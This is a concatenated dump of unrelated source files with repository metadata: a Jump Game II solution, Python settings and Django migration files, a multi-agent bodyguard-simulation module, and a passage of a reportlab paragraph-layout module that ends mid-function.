This problem has a nice BFS structure. Let's illustrate it using the example `nums = [2, 3, 1, 1, 4]` in the problem statement. We are initially at position `0`. Then we can move at most `nums[0]` steps from it. So, after one move, we may reach `nums[1] = 3` or `nums[2] = 1`. So these nodes are reachable in `1` move. From these nodes, we can further move to `nums[3] = 1` and `nums[4] = 4`. Now you can see that the target `nums[4] = 4` is reachable in `2` moves.
Putting this into code, we keep two pointers `start` and `end` that record the current range of starting nodes. After each move, we update `start` to `end + 1` and `end` to the farthest index reachable in one move from the current `[start, end]`.
To get an accepted solution, it is important to handle all the edge cases. The code below handles all of them in a unified way, without resorting to unclean `if` statements :-)
----------
**C++**
class Solution {
public:
int jump(vector<int>& nums) {
int n = nums.size(), step = 0, start = 0, end = 0;
while (end < n - 1) {
step++;
int maxend = end + 1;
for (int i = start; i <= end; i++) {
if (i + nums[i] >= n - 1) return step;
maxend = max(maxend, i + nums[i]);
}
start = end + 1;
end = maxend;
}
return step;
}
};
----------
**Python**
class Solution:
# @param {integer[]} nums
# @return {integer}
def jump(self, nums):
n, start, end, step = len(nums), 0, 0, 0
while end < n - 1:
step += 1
maxend = end + 1
for i in range(start, end + 1):
if i + nums[i] >= n - 1:
return step
maxend = max(maxend, i + nums[i])
start, end = end + 1, maxend
return step
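# Example: Solution().jump([2, 3, 1, 1, 4]) returns 2
# (jump from index 0 to index 1, then from index 1 to index 4)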
| [
"[email protected]"
]
| |
a43d5a84086bb4be7ba32c8067fcbd249315d7db | 929ce0470f5e9ce8ed7cabdfbcfa73c0b5b35d30 | /settings.py | 5d117541ecb60c1cac53f43154299046e18f055c | []
| no_license | milesgranger/cmdata | 2ee96706a61372c94955e0fd942e777149249e2c | 535b237af99d988e158ab8b5304d0d1340b7f908 | refs/heads/master | 2020-04-06T07:08:27.252382 | 2016-09-11T10:25:42 | 2016-09-11T10:25:42 | 65,610,733 | 0 | 1 | null | 2016-09-11T10:25:43 | 2016-08-13T09:44:49 | Python | UTF-8 | Python | false | false | 866 | py | import os
import logging
import json
from peewee import Model, SqliteDatabase
with open('settings.json', 'r') as myfile:
json_settings = json.loads(myfile.read())
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
SECRET_KEY = json_settings["SECRET_KEY"]
DEBUG = json_settings["DEBUG"]
#######################
### DATABASE CONFIG ###
#######################
DB_URI = json_settings['DATABASE']
DATABASE = SqliteDatabase(DB_URI, threadlocals=True)
class BaseModel(Model):
'''
Base class for all other DB Models
Basically defines which database to use
'''
class Meta:
database = DATABASE
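# Usage sketch (hypothetical model; the field type comes from peewee):
#   from peewee import CharField
#   class Note(BaseModel):
#       body = CharField()
#   DATABASE.create_tables([Note])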
#######################
### PATHS #############
#######################
ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
STATIC_DIR = os.path.join(ROOT_DIR, 'static')
TEMPLATES_DIR = os.path.join(ROOT_DIR, 'templates')
| [
"[email protected]"
]
| |
ff48c9f51db42b5415104dcad82dcc5e7180f1a0 | a097ecf40fee329cfa9e3f77e4b6e9e29a8f148a | /5_section/5_c4.py | ad4129556566f3c699ab43db88f59f5c50ed0ab1 | []
| no_license | FumihisaKobayashi/The_self_taught_python | 1e7008b17050db3e615c2f3aa68df2edc7f93192 | 329d376689029b75da73a6f98715cc7e83e8cc2c | refs/heads/master | 2021-01-06T16:04:13.382955 | 2020-07-28T14:39:24 | 2020-07-28T14:39:24 | 241,389,313 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | fumi = {
"身長": "1.73m",
"好きな色": "緑",
"好きな人": "Hideki Matsui"
}
answer = input("身長,好きな色 or 好きな人")
if answer in fumi:
a = fumi[answer]
print(a)
#: note | [
"[email protected]"
]
| |
794f234132b9911b2627c4d8a81cf9092ef9550b | 7751c53180eb5eda2c9ff6f1406d755733d7a3a0 | /multiagent/agents/bystander.py | 4f63775706930f75b6101b4a5bb89072ffa5e9a0 | [
"MIT"
]
| permissive | HassamSheikh/VIP_Protection_Envs | b2927de19565c6fb09d1db42105ea4defc7aa912 | ea8b4f702d037336812035abbf8aaa12e26f8c46 | refs/heads/master | 2020-07-14T01:32:15.620448 | 2019-08-29T18:03:45 | 2019-08-29T18:03:45 | 205,201,943 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,809 | py | import numpy as np
from . import *
import copy  # used in StreetBystander.vicsek_step; may not be provided by the wildcard import
class Bystander(Participant):
""" A bystander (crowd participant) in the bodyguard environment, performing a movement that involves visiting random landmarks. If the bystander is near a bodyguard, it stops...
"""
def __init__(self, scenario):
super().__init__(scenario)
self.action_callback = self.theaction
self.color = np.array([0.8, 0.0, 0.0]) # red
self.state.p_pos = np.random.uniform(-1,+1, scenario.world.dim_p)
self.state.p_vel = np.zeros(scenario.world.dim_p)
self.goal_a = None
self.wait_count = 0
def reset(self):
super(Bystander, self).reset()
self.goal_a=None
def theaction(self, agent, world):
""" The behavior of the bystanders. Implemented as callback function
"""
# If the agent finds itself out of range, jump to a random new location
if self.out_of_bounds():
self.reset()
bystander_action = Action()
# The bystanders freeze if they are near a bodyguard or have no goal
if self.near_bodyguard(agent, world) or not self.goal_a:
bystander_action.u = np.zeros(world.dim_p)
self.wait_count += 1
if self.wait_count > 50:
agent.goal_a = self.nearest_landmark(world)
relative_position = (agent.goal_a.state.p_pos - agent.state.p_pos)
bystander_action.u = (relative_position/np.linalg.norm(relative_position))
self.wait_count = 0
return bystander_action
# If the agent reached its goal, picks a new goal randomly from the landmarks
if self.reached_goal():
agent.goal_a = np.random.choice(world.landmarks)
# otherwise, move towards the landmark
relative_position = (agent.goal_a.state.p_pos - agent.state.p_pos)
bystander_action.u = (relative_position/np.linalg.norm(relative_position)) * self.step_size
return bystander_action
def near_bodyguard(self, agent, world):
bodyguard_p_pos = np.asarray([bodyguard.state.p_pos for bodyguard in self.scenario.bodyguards])
distance_between_all_bodyguards = np.linalg.norm(bodyguard_p_pos-agent.state.p_pos, axis=1)
return np.any(0.3 > distance_between_all_bodyguards)
def nearest_landmark(self, world):
landmark_p_pos = np.array([landmark.state.p_pos for landmark in world.landmarks])
idx = np.linalg.norm(landmark_p_pos-self.state.p_pos, axis=1).argsort()[0]
return world.landmarks[idx]
class StreetBystander(Bystander):
""" A bystander (crowd participant) in the bodyguard environment, performing Vicsek Particle Motion. If the bystander is near a bodyguard, it stops...
"""
def __init__(self, scenario):
super().__init__(scenario)
self.action_callback = self.theaction
self.theta = np.random.uniform(-np.pi,np.pi)
self.noise = np.random.rand()
def reset(self):
""" Reset the states of an agent """
self.state.p_vel = np.random.uniform(-.5, .5, self.scenario.world.dim_p)
self.theta=np.random.uniform(-np.pi,np.pi)
def theaction(self, agent, world):
""" The behavior of the bystanders. Implemented as callback function
"""
#print("bystander action")
# If the agent finds itself out of range, jump to a random new location
bystander_action = Action()
#The bystanders freeze if they are near a bodyguard
if self.near_bodyguard(agent, world) or self.out_of_bounds():
bystander_action.u = np.array([-0.2, -0.2])
return bystander_action
# otherwise, move towards the landmark
relative_position= (self.vicsek_step() - agent.state.p_pos)
bystander_action.u = (relative_position/np.linalg.norm(relative_position))
return bystander_action
def near_bodyguard(self, agent, world):
bodyguard_p_pos = np.asarray([bodyguard.state.p_pos for bodyguard in self.scenario.bodyguards])
distance_between_all_bodyguards = np.linalg.norm(bodyguard_p_pos-agent.state.p_pos, axis=1)
return np.any(0.1 > distance_between_all_bodyguards)
def vicsek_step(self):
noise_increments = (self.noise - 0.5)
bystander_p_pos = np.asarray([bystander.state.p_pos for bystander in self.scenario.bystanders])
distance_between_all_crowd = np.linalg.norm(bystander_p_pos-self.state.p_pos, axis=1)
np.nan_to_num(distance_between_all_crowd, False)
near_range_bystanders = np.where((distance_between_all_crowd > 0) & (distance_between_all_crowd <=1.5))[0].tolist()
near_angles = [self.scenario.bystanders[idx].theta for idx in near_range_bystanders]
near_angles = np.array(near_angles)
mean_directions = np.arctan2(np.mean(np.sin(near_angles)), np.mean(np.cos(near_angles)))
self.theta = mean_directions + noise_increments
vel = np.multiply([np.cos(self.theta), np.sin(self.theta)], self.state.p_vel)
position = self.state.p_pos + (vel * 0.15)
if not ((-self.scenario.env_range <= position[0] <= self.scenario.env_range) and (-self.scenario.env_range <= position[1] <= self.scenario.env_range)):
return copy.deepcopy(self.state.p_pos + .1)
return np.clip(position, -1, 1)
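    # For reference: vicsek_step approximates the standard Vicsek update
    # (Vicsek et al., 1995),
    #   theta_i(t+1) = <theta_j>_{|x_j - x_i| < r} + eta_i
    #   x_i(t+1)     = x_i(t) + v_i (cos theta_i, sin theta_i) dt
    # with r = 1.5, dt = 0.15, and a fixed per-agent noise term
    # (self.noise - 0.5); the speed factor here is the componentwise p_vel.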
class HostileBystander(Bystander):
"""A Hostile Bystander"""
def __init__(self, scenario):
super().__init__(scenario)
self.action_callback = None
#self.color = np.array([0.8, 0.0, 1.1])
def observation(self):
"""returns the observation of a hostile bystander"""
other_pos = []
other_vel = []
for other in self.scenario.world.agents:
if other is self: continue
other_pos.append(other.state.p_pos - self.state.p_pos)
other_vel.append(other.state.p_vel)
return np.concatenate([self.state.p_vel] + other_pos + other_vel)
def reward(self, world):
"""Reward for Hostile Bystander for being a threat to the VIP"""
vip_agent = self.scenario.vip_agent
rew = Threat(vip_agent, self.scenario.bodyguards, [self]).calculate_residual_threat_at_every_step()
bodyguards = self.scenario.bodyguards
for bodyguard in bodyguards:
rew += 0.1 * self.distance(bodyguard)
if self.is_collision(bodyguard):
rew -= 10
if self.is_collision(vip_agent):
rew += 10
def bound(x):
if x < 0.9:
return 0
if x < 1.0:
return (x - 0.9) * 10
return min(np.exp(2 * x - 2), 10)
for p in range(world.dim_p):
x = abs(self.state.p_pos[p])
rew -= bound(x)
return rew
| [
"[email protected]"
]
| |
56db26ac23eb5330f73c013d50f5c5683be26524 | ee3ededc11e224619506d39c95cd4c8a150b9ffc | /run/migrations/0022_auto_20210610_0543.py | c9d3e8ffae0d8ff5ddf7955fc8397c7651b14ea5 | []
| no_license | TwoPointFour/django-backend | 5b37b11c63c5f7b061d323af191dd7cc725c885c | fd41da863df4cf79e5c8f9af2b211d6628ab6651 | refs/heads/main | 2023-08-11T14:01:39.604186 | 2021-09-27T05:04:13 | 2021-09-27T05:04:13 | 377,231,515 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 626 | py | # Generated by Django 3.2.3 on 2021-06-09 21:43
from django.db import migrations, models
import run.models
class Migration(migrations.Migration):
dependencies = [
('run', '0021_alter_workoutlog_workouts'),
]
operations = [
migrations.AddField(
model_name='profile',
name='alias',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='profile',
name='profileImage',
field=models.ImageField(default='default/default.jpg', upload_to=run.models.upload_to),
),
]
| [
"[email protected]"
]
| |
7dd79a81c2691091fdf63dedb45319a7eae1a591 | 0fb12be061ab050904ceea99f6a938985a0d8acf | /report_mako2pdf/lib/xhtml2pdf/reportlab_paragraph.py | eba9e9aa506f6c2e6a82f44c220787a1075fbb14 | []
| no_license | libermatos/Openerp_6.1 | d17fbff1f35948e0c4176e2ed34ac5d7f8453834 | 510df13df7ea651c055b408ad66c580ca29d4ad7 | refs/heads/master | 2023-06-19T00:24:36.002581 | 2021-07-07T01:17:20 | 2021-07-07T01:17:20 | 383,574,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 71,161 | py | # -*- coding: utf-8 -*-
# Copyright ReportLab Europe Ltd. 2000-2008
# see license.txt for license details
# history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/platypus/paragraph.py
# Modifications by Dirk Holtwick, 2008
from string import join, whitespace
from operator import truth
from reportlab.pdfbase.pdfmetrics import stringWidth, getAscentDescent
from reportlab.platypus.paraparser import ParaParser
from reportlab.platypus.flowables import Flowable
from reportlab.lib.colors import Color
from reportlab.lib.enums import TA_LEFT, TA_RIGHT, TA_CENTER, TA_JUSTIFY
from reportlab.lib.textsplit import ALL_CANNOT_START
from copy import deepcopy
from reportlab.lib.abag import ABag
import re
PARAGRAPH_DEBUG = False
LEADING_FACTOR = 1.0
_wsc_re_split = re.compile('[%s]+' % re.escape(''.join((
u'\u0009', # HORIZONTAL TABULATION
u'\u000A', # LINE FEED
u'\u000B', # VERTICAL TABULATION
u'\u000C', # FORM FEED
u'\u000D', # CARRIAGE RETURN
u'\u001C', # FILE SEPARATOR
u'\u001D', # GROUP SEPARATOR
u'\u001E', # RECORD SEPARATOR
u'\u001F', # UNIT SEPARATOR
u'\u0020', # SPACE
u'\u0085', # NEXT LINE
#u'\u00A0', # NO-BREAK SPACE
u'\u1680', # OGHAM SPACE MARK
u'\u2000', # EN QUAD
u'\u2001', # EM QUAD
u'\u2002', # EN SPACE
u'\u2003', # EM SPACE
u'\u2004', # THREE-PER-EM SPACE
u'\u2005', # FOUR-PER-EM SPACE
u'\u2006', # SIX-PER-EM SPACE
u'\u2007', # FIGURE SPACE
u'\u2008', # PUNCTUATION SPACE
u'\u2009', # THIN SPACE
u'\u200A', # HAIR SPACE
u'\u200B', # ZERO WIDTH SPACE
u'\u2028', # LINE SEPARATOR
u'\u2029', # PARAGRAPH SEPARATOR
u'\u202F', # NARROW NO-BREAK SPACE
u'\u205F', # MEDIUM MATHEMATICAL SPACE
u'\u3000', # IDEOGRAPHIC SPACE
)))).split
def split(text, delim=None):
if type(text) is str:
text = text.decode('utf8')
if type(delim) is str:
delim = delim.decode('utf8')
elif delim is None and u'\xa0' in text:
return [uword.encode('utf8') for uword in _wsc_re_split(text)]
return [uword.encode('utf8') for uword in text.split(delim)]
def strip(text):
if type(text) is str:
text = text.decode('utf8')
return text.strip().encode('utf8')
class ParaLines(ABag):
"""
class ParaLines contains the broken into lines representation of Paragraphs
kind=0 Simple
fontName, fontSize, textColor apply to whole Paragraph
lines [(extraSpace1,words1),....,(extraspaceN,wordsN)]
kind==1 Complex
lines [FragLine1,...,FragLineN]
"""
class FragLine(ABag):
"""
class FragLine contains a styled line (ie a line with more than one style)::
extraSpace unused space for justification only
wordCount 1+spaces in line for justification purposes
words [ParaFrags] style text lumps to be concatenated together
fontSize maximum fontSize seen on the line; not used at present,
but could be used for line spacing.
"""
#our one and only parser
# XXXXX if the parser has any internal state using only one is probably a BAD idea!
_parser = ParaParser()
def _lineClean(L):
return join(filter(truth, split(strip(L))))
def cleanBlockQuotedText(text, joiner=' '):
"""This is an internal utility which takes triple-
quoted text form within the document and returns
(hopefully) the paragraph the user intended originally."""
L = filter(truth, map(_lineClean, split(text, '\n')))
return join(L, joiner)
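# e.g. cleanBlockQuotedText('  hello\n    world  ') -> 'hello world'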
def setXPos(tx, dx):
if dx > 1e-6 or dx < -1e-6:
tx.setXPos(dx)
def _leftDrawParaLine(tx, offset, extraspace, words, last=0):
setXPos(tx, offset)
tx._textOut(join(words), 1)
setXPos(tx, -offset)
return offset
def _centerDrawParaLine(tx, offset, extraspace, words, last=0):
m = offset + 0.5 * extraspace
setXPos(tx, m)
tx._textOut(join(words), 1)
setXPos(tx, -m)
return m
def _rightDrawParaLine(tx, offset, extraspace, words, last=0):
m = offset + extraspace
setXPos(tx, m)
tx._textOut(join(words), 1)
setXPos(tx, -m)
return m
def _justifyDrawParaLine(tx, offset, extraspace, words, last=0):
setXPos(tx, offset)
text = join(words)
if last:
#last one, left align
tx._textOut(text, 1)
else:
nSpaces = len(words) - 1
if nSpaces:
tx.setWordSpace(extraspace / float(nSpaces))
tx._textOut(text, 1)
tx.setWordSpace(0)
else:
tx._textOut(text, 1)
setXPos(tx, -offset)
return offset
def imgVRange(h, va, fontSize):
"""
return bottom,top offsets relative to baseline(0)
"""
if va == 'baseline':
iyo = 0
elif va in ('text-top', 'top'):
iyo = fontSize - h
elif va == 'middle':
iyo = fontSize - (1.2 * fontSize + h) * 0.5
elif va in ('text-bottom', 'bottom'):
iyo = fontSize - 1.2 * fontSize
elif va == 'super':
iyo = 0.5 * fontSize
elif va == 'sub':
iyo = -0.5 * fontSize
elif hasattr(va, 'normalizedValue'):
iyo = va.normalizedValue(fontSize)
else:
iyo = va
return iyo, iyo + h
_56 = 5. / 6
_16 = 1. / 6
def _putFragLine(cur_x, tx, line):
xs = tx.XtraState
cur_y = xs.cur_y
x0 = tx._x0
autoLeading = xs.autoLeading
leading = xs.leading
cur_x += xs.leftIndent
dal = autoLeading in ('min', 'max')
if dal:
if autoLeading == 'max':
ascent = max(_56 * leading, line.ascent)
descent = max(_16 * leading, -line.descent)
else:
ascent = line.ascent
descent = -line.descent
leading = ascent + descent
if tx._leading != leading:
tx.setLeading(leading)
if dal:
olb = tx._olb
if olb is not None:
xcy = olb - ascent
if tx._oleading != leading:
cur_y += leading - tx._oleading
if abs(xcy - cur_y) > 1e-8:
cur_y = xcy
tx.setTextOrigin(x0, cur_y)
xs.cur_y = cur_y
tx._olb = cur_y - descent
tx._oleading = leading
# Letter spacing
if xs.style.letterSpacing != 'normal':
tx.setCharSpace(int(xs.style.letterSpacing))
ws = getattr(tx, '_wordSpace', 0)
nSpaces = 0
words = line.words
for f in words:
if hasattr(f, 'cbDefn'):
cbDefn = f.cbDefn
kind = cbDefn.kind
if kind == 'img':
#draw image cbDefn,cur_y,cur_x
w = cbDefn.width
h = cbDefn.height
txfs = tx._fontsize
if txfs is None:
txfs = xs.style.fontSize
iy0, iy1 = imgVRange(h, cbDefn.valign, txfs)
cur_x_s = cur_x + nSpaces * ws
tx._canvas.drawImage(cbDefn.image.getImage(), cur_x_s, cur_y + iy0, w, h, mask='auto')
cur_x += w
cur_x_s += w
setXPos(tx, cur_x_s - tx._x0)
elif kind == 'barcode':
barcode = cbDefn.barcode
w = cbDefn.width
h = cbDefn.height
txfs = tx._fontsize
if txfs is None:
txfs = xs.style.fontSize
iy0, iy1 = imgVRange(h, cbDefn.valign, txfs)
cur_x_s = cur_x + nSpaces * ws
barcode.draw(canvas=tx._canvas, xoffset=cur_x_s)
cur_x += w
cur_x_s += w
setXPos(tx, cur_x_s - tx._x0)
else:
name = cbDefn.name
if kind == 'anchor':
tx._canvas.bookmarkHorizontal(name, cur_x, cur_y + leading)
else:
func = getattr(tx._canvas, name, None)
if not func:
raise AttributeError("Missing %s callback attribute '%s'" % (kind, name))
func(tx._canvas, kind, cbDefn.label)
if f is words[-1]:
if not tx._fontname:
tx.setFont(xs.style.fontName, xs.style.fontSize)
tx._textOut('', 1)
elif kind == 'img':
tx._textOut('', 1)
else:
cur_x_s = cur_x + nSpaces * ws
if (tx._fontname, tx._fontsize) != (f.fontName, f.fontSize):
tx._setFont(f.fontName, f.fontSize)
if xs.textColor != f.textColor:
xs.textColor = f.textColor
tx.setFillColor(f.textColor)
if xs.rise != f.rise:
xs.rise = f.rise
tx.setRise(f.rise)
text = f.text
tx._textOut(text, f is words[-1]) # cheap textOut
# XXX Modified for XHTML2PDF
# Background colors (done like underline)
if hasattr(f, "backColor"):
if xs.backgroundColor != f.backColor or xs.backgroundFontSize != f.fontSize:
if xs.backgroundColor is not None:
xs.backgrounds.append((xs.background_x, cur_x_s, xs.backgroundColor, xs.backgroundFontSize))
xs.background_x = cur_x_s
xs.backgroundColor = f.backColor
xs.backgroundFontSize = f.fontSize
# Underline
if not xs.underline and f.underline:
xs.underline = 1
xs.underline_x = cur_x_s
xs.underlineColor = f.textColor
elif xs.underline:
if not f.underline:
xs.underline = 0
xs.underlines.append((xs.underline_x, cur_x_s, xs.underlineColor))
xs.underlineColor = None
elif xs.textColor != xs.underlineColor:
xs.underlines.append((xs.underline_x, cur_x_s, xs.underlineColor))
xs.underlineColor = xs.textColor
xs.underline_x = cur_x_s
# Strike
if not xs.strike and f.strike:
xs.strike = 1
xs.strike_x = cur_x_s
xs.strikeColor = f.textColor
# XXX Modified for XHTML2PDF
xs.strikeFontSize = f.fontSize
elif xs.strike:
if not f.strike:
xs.strike = 0
# XXX Modified for XHTML2PDF
xs.strikes.append((xs.strike_x, cur_x_s, xs.strikeColor, xs.strikeFontSize))
xs.strikeColor = None
xs.strikeFontSize = None
elif xs.textColor != xs.strikeColor:
xs.strikes.append((xs.strike_x, cur_x_s, xs.strikeColor, xs.strikeFontSize))
xs.strikeColor = xs.textColor
xs.strikeFontSize = f.fontSize
xs.strike_x = cur_x_s
if f.link and not xs.link:
if not xs.link:
xs.link = f.link
xs.link_x = cur_x_s
xs.linkColor = xs.textColor
elif xs.link:
if not f.link:
xs.links.append((xs.link_x, cur_x_s, xs.link, xs.linkColor))
xs.link = None
xs.linkColor = None
elif f.link != xs.link or xs.textColor != xs.linkColor:
xs.links.append((xs.link_x, cur_x_s, xs.link, xs.linkColor))
xs.link = f.link
xs.link_x = cur_x_s
xs.linkColor = xs.textColor
txtlen = tx._canvas.stringWidth(text, tx._fontname, tx._fontsize)
cur_x += txtlen
nSpaces += text.count(' ')
cur_x_s = cur_x + (nSpaces - 1) * ws
# XXX Modified for XHTML2PDF
# Underline
if xs.underline:
xs.underlines.append((xs.underline_x, cur_x_s, xs.underlineColor))
# XXX Modified for XHTML2PDF
# Backcolor
if hasattr(f, "backColor"):
if xs.backgroundColor is not None:
xs.backgrounds.append((xs.background_x, cur_x_s, xs.backgroundColor, xs.backgroundFontSize))
# XXX Modified for XHTML2PDF
# Strike
if xs.strike:
xs.strikes.append((xs.strike_x, cur_x_s, xs.strikeColor, xs.strikeFontSize))
if xs.link:
xs.links.append((xs.link_x, cur_x_s, xs.link, xs.linkColor))
if tx._x0 != x0:
setXPos(tx, x0 - tx._x0)
def _leftDrawParaLineX(tx, offset, line, last=0):
setXPos(tx, offset)
_putFragLine(offset, tx, line)
setXPos(tx, -offset)
def _centerDrawParaLineX(tx, offset, line, last=0):
m = offset + 0.5 * line.extraSpace
setXPos(tx, m)
_putFragLine(m, tx, line)
setXPos(tx, -m)
def _rightDrawParaLineX(tx, offset, line, last=0):
m = offset + line.extraSpace
setXPos(tx, m)
_putFragLine(m, tx, line)
setXPos(tx, -m)
def _justifyDrawParaLineX(tx, offset, line, last=0):
setXPos(tx, offset)
extraSpace = line.extraSpace
nSpaces = line.wordCount - 1
if last or not nSpaces or abs(extraSpace) <= 1e-8 or line.lineBreak:
_putFragLine(offset, tx, line) # no space modification
else:
tx.setWordSpace(extraSpace / float(nSpaces))
_putFragLine(offset, tx, line)
tx.setWordSpace(0)
setXPos(tx, -offset)
def _sameFrag(f, g):
"""
returns 1 if two ParaFrags map out the same
"""
if (hasattr(f, 'cbDefn') or hasattr(g, 'cbDefn')
or hasattr(f, 'lineBreak') or hasattr(g, 'lineBreak')): return 0
for a in ('fontName', 'fontSize', 'textColor', 'backColor', 'rise', 'underline', 'strike', 'link'):
if getattr(f, a, None) != getattr(g, a, None): return 0
return 1
def _getFragWords(frags):
"""
given a Parafrag list return a list of fragwords
[[size, (f00,w00), ..., (f0n,w0n)],....,[size, (fm0,wm0), ..., (f0n,wmn)]]
each pair f,w represents a style and some string
each sublist represents a word
"""
R = []
W = []
n = 0
hangingStrip = False
for f in frags:
text = f.text
        #del f.text # we can't do this until we sort out splitting of paragraphs
if text != '':
if hangingStrip:
hangingStrip = False
text = text.lstrip()
S = split(text)
if S == []:
S = ['']
if W != [] and text[0] in whitespace:
W.insert(0, n)
R.append(W)
W = []
n = 0
for w in S[:-1]:
W.append((f, w))
n += stringWidth(w, f.fontName, f.fontSize)
W.insert(0, n)
R.append(W)
W = []
n = 0
w = S[-1]
W.append((f, w))
n += stringWidth(w, f.fontName, f.fontSize)
if text and text[-1] in whitespace:
W.insert(0, n)
R.append(W)
W = []
n = 0
elif hasattr(f, 'cbDefn'):
w = getattr(f.cbDefn, 'width', 0)
if w:
if W != []:
W.insert(0, n)
R.append(W)
W = []
n = 0
R.append([w, (f, '')])
else:
W.append((f, ''))
elif hasattr(f, 'lineBreak'):
#pass the frag through. The line breaker will scan for it.
if W != []:
W.insert(0, n)
R.append(W)
W = []
n = 0
R.append([0, (f, '')])
hangingStrip = True
if W != []:
W.insert(0, n)
R.append(W)
return R
def _split_blParaSimple(blPara, start, stop):
f = blPara.clone()
for a in ('lines', 'kind', 'text'):
if hasattr(f, a): delattr(f, a)
f.words = []
for l in blPara.lines[start:stop]:
for w in l[1]:
f.words.append(w)
return [f]
def _split_blParaHard(blPara, start, stop):
f = []
lines = blPara.lines[start:stop]
for l in lines:
for w in l.words:
f.append(w)
if l is not lines[-1]:
i = len(f) - 1
while i >= 0 and hasattr(f[i], 'cbDefn') and not getattr(f[i].cbDefn, 'width', 0): i -= 1
if i >= 0:
g = f[i]
if not g.text:
g.text = ' '
elif g.text[-1] != ' ':
g.text += ' '
return f
def _drawBullet(canvas, offset, cur_y, bulletText, style):
"""
    draw a bullet; text could be a simple string or a frag list
"""
tx2 = canvas.beginText(style.bulletIndent, cur_y + getattr(style, "bulletOffsetY", 0))
tx2.setFont(style.bulletFontName, style.bulletFontSize)
tx2.setFillColor(hasattr(style, 'bulletColor') and style.bulletColor or style.textColor)
if isinstance(bulletText, basestring):
tx2.textOut(bulletText)
else:
for f in bulletText:
if hasattr(f, "image"):
image = f.image
width = image.drawWidth
height = image.drawHeight
gap = style.bulletFontSize * 0.25
img = image.getImage()
# print style.bulletIndent, offset, width
canvas.drawImage(
img,
style.leftIndent - width - gap,
cur_y + getattr(style, "bulletOffsetY", 0),
width,
height)
else:
tx2.setFont(f.fontName, f.fontSize)
tx2.setFillColor(f.textColor)
tx2.textOut(f.text)
canvas.drawText(tx2)
#AR making definition lists a bit less ugly
#bulletEnd = tx2.getX()
bulletEnd = tx2.getX() + style.bulletFontSize * 0.6
offset = max(offset, bulletEnd - style.leftIndent)
return offset
def _handleBulletWidth(bulletText, style, maxWidths):
"""
    work out bullet width and adjust maxWidths[0] if necessary
"""
if bulletText:
if isinstance(bulletText, basestring):
bulletWidth = stringWidth(bulletText, style.bulletFontName, style.bulletFontSize)
else:
#it's a list of fragments
bulletWidth = 0
for f in bulletText:
bulletWidth = bulletWidth + stringWidth(f.text, f.fontName, f.fontSize)
bulletRight = style.bulletIndent + bulletWidth + 0.6 * style.bulletFontSize
indent = style.leftIndent + style.firstLineIndent
if bulletRight > indent:
#..then it overruns, and we have less space available on line 1
maxWidths[0] -= (bulletRight - indent)
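# NB: splitLines0 below appears to be a legacy/unfinished helper; parts of it
# (e.g. 'g' built as a tuple but used like an object) would not run as written.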
def splitLines0(frags, widths):
"""
given a list of ParaFrags we return a list of ParaLines
each ParaLine has
1) ExtraSpace
2) blankCount
3) [textDefns....]
each text definition is a (ParaFrag, start, limit) triplet
"""
#initialise the algorithm
lines = []
lineNum = 0
maxW = widths[lineNum]
i = -1
l = len(frags)
lim = start = 0
while 1:
#find a non whitespace character
while i < l:
while start < lim and text[start] == ' ': start += 1
if start == lim:
i += 1
if i == l: break
start = 0
f = frags[i]
text = f.text
lim = len(text)
else:
break # we found one
if start == lim: break # if we didn't find one we are done
#start of a line
g = (None, None, None)
line = []
cLen = 0
nSpaces = 0
while cLen < maxW:
j = text.find(' ', start)
if j < 0:
                j = lim
w = stringWidth(text[start:j], f.fontName, f.fontSize)
cLen += w
if cLen > maxW and line != []:
cLen = cLen - w
#this is the end of the line
while g.text[lim] == ' ':
lim -= 1
nSpaces -= 1
break
if j < 0:
j = lim
if g[0] is f:
g[2] = j #extend
else:
g = (f, start, j)
line.append(g)
if j == lim:
i += 1
def _do_under_line(i, t_off, ws, tx, lm=-0.125):
y = tx.XtraState.cur_y - i * tx.XtraState.style.leading + lm * tx.XtraState.f.fontSize
textlen = tx._canvas.stringWidth(join(tx.XtraState.lines[i][1]), tx._fontname, tx._fontsize)
tx._canvas.line(t_off, y, t_off + textlen + ws, y)
_scheme_re = re.compile('^[a-zA-Z][-+a-zA-Z0-9]+$')
def _doLink(tx, link, rect):
if isinstance(link, unicode):
link = link.encode('utf8')
parts = link.split(':', 1)
scheme = len(parts) == 2 and parts[0].lower() or ''
if _scheme_re.match(scheme) and scheme != 'document':
kind = scheme.lower() == 'pdf' and 'GoToR' or 'URI'
if kind == 'GoToR': link = parts[1]
tx._canvas.linkURL(link, rect, relative=1, kind=kind)
else:
if link[0] == '#':
link = link[1:]
scheme = ''
tx._canvas.linkRect("", scheme != 'document' and link or parts[1], rect, relative=1)
def _do_link_line(i, t_off, ws, tx):
xs = tx.XtraState
leading = xs.style.leading
y = xs.cur_y - i * leading - xs.f.fontSize / 8.0 # 8.0 factor copied from para.py
text = join(xs.lines[i][1])
textlen = tx._canvas.stringWidth(text, tx._fontname, tx._fontsize)
_doLink(tx, xs.link, (t_off, y, t_off + textlen + ws, y + leading))
# XXX Modified for XHTML2PDF
def _do_post_text(tx):
"""
Try to find out what the variables mean:
tx A structure containing more informations about paragraph ???
leading Height of lines
ff 1/8 of the font size
y0 The "baseline" postion ???
y 1/8 below the baseline
"""
xs = tx.XtraState
leading = xs.style.leading
autoLeading = xs.autoLeading
f = xs.f
if autoLeading == 'max':
# leading = max(leading, f.fontSize)
leading = max(leading, LEADING_FACTOR * f.fontSize)
elif autoLeading == 'min':
leading = LEADING_FACTOR * f.fontSize
ff = 0.125 * f.fontSize
y0 = xs.cur_y
y = y0 - ff
# Background
for x1, x2, c, fs in xs.backgrounds:
inlineFF = fs * 0.125
gap = inlineFF * 1.25
tx._canvas.setFillColor(c)
tx._canvas.rect(x1, y - gap, x2 - x1, fs + 1, fill=1, stroke=0)
xs.backgrounds = []
xs.background = 0
xs.backgroundColor = None
xs.backgroundFontSize = None
# Underline
yUnderline = y0 - 1.5 * ff
tx._canvas.setLineWidth(ff * 0.75)
csc = None
for x1, x2, c in xs.underlines:
if c != csc:
tx._canvas.setStrokeColor(c)
csc = c
tx._canvas.line(x1, yUnderline, x2, yUnderline)
xs.underlines = []
xs.underline = 0
xs.underlineColor = None
# Strike
for x1, x2, c, fs in xs.strikes:
